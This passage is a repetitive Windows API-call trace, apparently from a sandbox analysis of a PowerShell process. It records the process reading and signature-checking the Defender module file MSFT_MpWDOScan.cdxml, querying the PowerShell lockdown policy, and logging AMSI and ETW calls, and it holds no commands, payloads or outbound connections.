lpOldMode=0x1b62ccb8) returned 1 [0339.479] GetFileType (hFile=0x7cc) returned 0x1 [0339.480] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x0 [0339.480] ReadFile (in: hFile=0x7cc, lpBuffer=0x2716748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2716748*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.481] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x1000 [0339.481] ReadFile (in: hFile=0x7cc, lpBuffer=0x2716748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2716748*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.481] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x2000 [0339.481] ReadFile (in: hFile=0x7cc, lpBuffer=0x2716748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2716748*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.482] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3000 [0339.482] ReadFile (in: hFile=0x7cc, lpBuffer=0x2716748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2716748*, lpNumberOfBytesRead=0x1b62cd58*=0xcd2, lpOverlapped=0x0) returned 1 [0339.482] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3cd2 [0339.482] ReadFile (in: hFile=0x7cc, lpBuffer=0x2715b6a, nNumberOfBytesToRead=0x32e, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2715b6a*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0339.482] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3cd2 [0339.482] ReadFile (in: hFile=0x7cc, lpBuffer=0x2716748, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2716748*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0339.482] CoTaskMemAlloc (cb=0x20c) returned 0x1b64a2b0 [0339.482] GetSystemDirectoryW (in: lpBuffer=0x1b64a2b0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0339.483] CoTaskMemFree (pv=0x1b64a2b0) [0339.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0339.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0339.483] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca18) returned 1 [0339.483] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd40 | out: lpFileInformation=0x1b62cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0339.483] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9c8) returned 1 [0339.483] GetSystemInfo (in: lpSystemInfo=0x1b62cdc0 | out: lpSystemInfo=0x1b62cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0339.484] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62ccc8 | out: phkResult=0x1b62ccc8*=0x7d0) returned 0x0 [0339.484] RegQueryValueExW (in: hKey=0x7d0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62cd18, lpData=0x0, lpcbData=0x1b62cd10*=0x0 | out: lpType=0x1b62cd18*=0x0, lpData=0x0, lpcbData=0x1b62cd10*=0x0) returned 0x2 [0339.484] RegCloseKey (hKey=0x7d0) returned 0x0 [0339.484] CloseHandle (hObject=0x7cc) returned 1 [0339.487] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0339.487] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0339.487] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0339.487] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0339.487] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0339.487] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0339.488] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0339.488] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0339.608] CoCreateGuid (in: pguid=0x1b62ce58 | out: pguid=0x1b62ce58*(Data1=0x6a43123c, Data2=0xfb38, Data3=0x4c0a, Data4=([0]=0xa6, [1]=0x8f, [2]=0x2b, [3]=0x32, [4]=0x7f, [5]=0x16, [6]=0xc2, [7]=0xd7))) returned 0x0 [0339.611] AmsiScanBuffer () returned 0x80070015 [0339.618] EtwEventWriteTransfer () returned 0x0 [0339.618] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.619] EtwEventActivityIdControl () returned 0x0 [0339.619] EtwEventActivityIdControl () returned 0x0 [0339.619] EtwEventActivityIdControl () returned 0x0 [0339.619] EtwEventActivityIdControl () returned 0x0 [0339.620] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.620] EtwEventActivityIdControl () returned 0x0 [0339.620] EtwEventActivityIdControl () returned 0x0 [0339.620] EtwEventActivityIdControl () returned 0x0 [0339.620] EtwEventActivityIdControl () returned 0x0 [0339.621] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0x962ece5, Data2=0xc6d4, Data3=0x4e29, Data4=([0]=0x80, [1]=0x8a, [2]=0x77, [3]=0x29, [4]=0xcf, [5]=0x21, [6]=0xcc, [7]=0x6b))) returned 0x0 [0339.621] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0x88ba9769, Data2=0xeb1, Data3=0x47c4, Data4=([0]=0xb0, [1]=0x99, [2]=0x1d, [3]=0xf2, [4]=0x21, [5]=0x16, [6]=0x73, [7]=0xad))) returned 0x0 [0339.621] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0339.621] EtwEventActivityIdControl () returned 0x0 [0339.621] EtwEventActivityIdControl () returned 0x0 [0339.621] EtwEventActivityIdControl () returned 0x0 [0339.622] EtwEventActivityIdControl () returned 0x0 [0339.623] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml")) returned 0x20 [0339.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0339.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0339.623] CoTaskMemAlloc (cb=0x20c) returned 0x1b64a2b0 [0339.623] GetSystemDirectoryW (in: lpBuffer=0x1b64a2b0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0339.623] CoTaskMemFree (pv=0x1b64a2b0) [0339.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0339.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0339.624] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9f8) returned 1 [0339.624] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd20 | out: lpFileInformation=0x1b62cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0339.624] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9a8) returned 1 [0339.624] GetSystemInfo (in: lpSystemInfo=0x1b62cda0 | out: lpSystemInfo=0x1b62cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0339.624] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62cca8 | out: phkResult=0x1b62cca8*=0x7cc) returned 0x0 [0339.624] RegQueryValueExW (in: hKey=0x7cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62ccf8, lpData=0x0, lpcbData=0x1b62ccf0*=0x0 | out: lpType=0x1b62ccf8*=0x0, lpData=0x0, lpcbData=0x1b62ccf0*=0x0) returned 0x2 [0339.625] RegCloseKey (hKey=0x7cc) returned 0x0 [0339.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0339.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0339.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca48) returned 1 [0339.625] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x27b4a40 | out: lpFileInformation=0x27b4a40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2dfdaf58, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3889)) returned 1 [0339.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0339.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0339.625] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0339.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9c8) returned 1 [0339.625] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62ccf0 | out: lpFileInformation=0x1b62ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2dfdaf58, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3889)) returned 1 [0339.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c978) returned 1 [0339.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0339.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0339.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0339.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0339.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c888) returned 1 [0339.626] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62cbb0 | out: lpFileInformation=0x1b62cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2dfdaf58, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c309006, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3889)) returned 1 [0339.626] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c838) returned 1 [0339.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0339.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0339.626] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca88) returned 1 [0339.627] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0339.627] GetFileType (hFile=0x7cc) returned 0x1 [0339.627] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0339.627] GetFileType (hFile=0x7cc) returned 0x1 [0339.627] WTGetSignatureInfo () returned 0x0 [0339.648] CertDuplicateCertificateContext (pCertContext=0x1b661d70) returned 0x1b661d70 [0339.649] CryptCATHandleFromStore () returned 0x6fb4f0 [0339.649] WTHelperGetProvSignerFromChain () returned 0x6fe420 [0339.649] WTHelperGetProvCertFromChain () returned 0x6fbaa0 [0339.649] CertDuplicateCertificateContext (pCertContext=0x1b662170) returned 0x1b662170 [0339.650] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62caf8 | out: phkResult=0x1b62caf8*=0x7d4) returned 0x0 [0339.650] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x0, lpcbData=0x1b62cb40*=0x0 | out: lpType=0x1b62cb48*=0x1, lpData=0x0, lpcbData=0x1b62cb40*=0x56) returned 0x0 [0339.650] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x27b52a8, lpcbData=0x1b62cb40*=0x56 | out: lpType=0x1b62cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b62cb40*=0x56) returned 0x0 [0339.650] RegCloseKey (hKey=0x7d4) returned 0x0 [0339.650] CoTaskMemAlloc (cb=0x10) returned 0x1a8a8070 [0339.650] CoTaskMemAlloc (cb=0x50) returned 0x1a89a0e0 [0339.650] WinVerifyTrust () returned 0x0 [0339.651] CoTaskMemFree (pv=0x1a89a0e0) [0339.651] CoTaskMemFree (pv=0x1a8a8070) [0339.651] CertFreeCertificateContext (pCertContext=0x1b661d70) returned 1 [0339.651] CloseHandle (hObject=0x7cc) returned 1 [0339.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x51 [0339.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", nBufferLength=0x51, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml", lpFilePart=0x0) returned 0x50 [0339.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62cd48) returned 1 [0339.652] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpWDOScan.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpwdoscan.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0339.652] GetFileType (hFile=0x7cc) returned 0x1 [0339.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62ccb8) returned 1 [0339.652] GetFileType (hFile=0x7cc) returned 0x1 [0339.652] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x0 [0339.652] ReadFile (in: hFile=0x7cc, lpBuffer=0x27b63e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x27b63e8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.653] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x1000 [0339.653] ReadFile (in: hFile=0x7cc, lpBuffer=0x27b63e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x27b63e8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.654] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x2000 [0339.654] ReadFile (in: hFile=0x7cc, lpBuffer=0x27b63e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x27b63e8*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0339.654] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3000 [0339.654] ReadFile (in: hFile=0x7cc, lpBuffer=0x27b63e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x27b63e8*, lpNumberOfBytesRead=0x1b62cd58*=0x889, lpOverlapped=0x0) returned 1 [0339.654] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3889 [0339.654] ReadFile (in: hFile=0x7cc, lpBuffer=0x27b57d9, nNumberOfBytesToRead=0x377, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x27b57d9*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0339.654] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x3889 [0339.654] ReadFile (in: hFile=0x7cc, lpBuffer=0x27b63e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x27b63e8*, lpNumberOfBytesRead=0x1b62cd58*=0x0, lpOverlapped=0x0) returned 1 [0339.655] CoTaskMemAlloc (cb=0x20c) returned 0x1b6484f0 [0339.655] GetSystemDirectoryW (in: lpBuffer=0x1b6484f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0339.655] CoTaskMemFree (pv=0x1b6484f0) [0339.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0339.655] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0339.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca18) returned 1 [0339.655] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd40 | out: lpFileInformation=0x1b62cd40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0339.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9c8) returned 1 [0339.655] GetSystemInfo (in: lpSystemInfo=0x1b62cdc0 | out: lpSystemInfo=0x1b62cdc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0339.656] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62ccc8 | out: phkResult=0x1b62ccc8*=0x7d0) returned 0x0 [0339.656] RegQueryValueExW (in: hKey=0x7d0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62cd18, lpData=0x0, lpcbData=0x1b62cd10*=0x0 | out: lpType=0x1b62cd18*=0x0, lpData=0x0, lpcbData=0x1b62cd10*=0x0) returned 0x2 [0339.656] RegCloseKey (hKey=0x7d0) returned 0x0 [0339.656] CloseHandle (hObject=0x7cc) returned 1 [0339.675] CoCreateGuid (in: pguid=0x1b62ce58 | out: pguid=0x1b62ce58*(Data1=0x76248bfb, Data2=0xe2fd, Data3=0x4331, Data4=([0]=0x8a, [1]=0x51, [2]=0x2d, [3]=0x75, [4]=0x63, [5]=0xae, [6]=0x6f, [7]=0xcf))) returned 0x0 [0339.680] AmsiScanBuffer () returned 0x80070015 [0339.687] EtwEventWriteTransfer () returned 0x0 [0339.689] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c0a0, nSize=0xd5 | out: 